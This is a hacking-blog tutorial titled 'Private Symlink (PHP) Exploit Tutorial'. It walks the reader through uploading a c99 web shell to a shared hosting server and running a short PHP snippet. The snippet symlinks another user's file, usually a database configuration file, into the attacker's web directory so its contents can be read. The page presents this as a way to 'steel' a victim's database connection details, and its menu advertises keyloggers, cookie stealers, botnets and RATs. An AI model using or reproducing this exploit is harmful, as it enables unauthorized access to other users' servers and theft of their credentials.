Design Private Symlink (PHP) Exploit Tutorial ~ EthiCal HaCkeRs

  • Keyloggers

    Keyyloggers Tools and Tutorials. Learn how keyloggers work and how to use them . ...

  • Cookie Stealers

    Cookie Stealers Tools and Tutorials. Learn how Stealers work and how to use them ...

  • Botnets

    Botnet Tools and tutorials. What is Zeus and Citadel bot and how to use them . ...

  • RATS

    Remote Administration tools and tutorials. ...

  • Website Hacking

    How to Hack Websites Vulnerabilities tools and tutorials ...

Private Symlink (PHP) Exploit Tutorial

Posted by Anonymous On 02:13 No comments



++++++++++++++++++++++++++++++++++++++++++++++++++ +++++
~*^...Symlink(PHP) Exploit Tutorial...^*~
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++

~*^...LEECHERS, DON'T MAKE ANY CHANGES IN THE Tutorial...^*~

First of all we use Symlink function to make a shortcut for any file or folder we want

that's why this function will be very useful for us to read any folder or file we want(For More Info Use Google).

Here We are using the Shell Named "c99" to execute the small code of php(Eval Code) on the shared hosting server.

The Exploit is used to download the victim's database If and only if the victim is in a shared host


Download the below Shell & Follow the steps.

================================================== ==============
Get Any C99 Shell
================================================== ==============

/Step 1 $ Upload the php i.e Shell.php

Shell on your root path. That is /home/hackerz/public_html .

/Step 2 $ Open the uploaded file . The path will look like

================================================== ==============================​==
http://www.yoursitename.com/shell.php
================================================== ==============================​==


/Step 3 $ Next Step is read carefully the below php Eval Code . it's about 10 lines of php code.


!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!​!!!

$filepath='/home/xx/public_html/xx.xx';
$sitepath='/home/xx/public_html/';
$writeblefilepath='myfile.txt';$flib=$sitepath.$wr iteblefilepath;
@unlink($flib);
symlink($filepath, $flib);
echo readlink($flib) . "\n";
echo "<textarea cols=30 rows=10>".file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/" . $writeblefilepath)."</tex" . "tarea>";
@unlink($flib);

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!​!!!!

/Step 4 $ You should replace (xx) in the code in the upper two lines.

In the 1st xx in the line one, means the target username.

In the 2nd xx.xx in the line one, means the target file full path in other word it's

usually used to read database configuration files to to steel it's connection information.

xx in the line two, means your username. "For Eg :- /home/Your_Ass/public_html/configuration.php"

$writeblefilepath, to enter any writable path on your site & also it is used fo to do the link process,

and write the output.For @unlink you can search for them on php.net .

-- -- --- -- - -- -
Loading . .. ..
- - -- - -- - -- - -- - - -

__- -- - -- - - -- - --- - -- - -- - -- -

THE END.....

Categories: ,

0 comments :

Post a Comment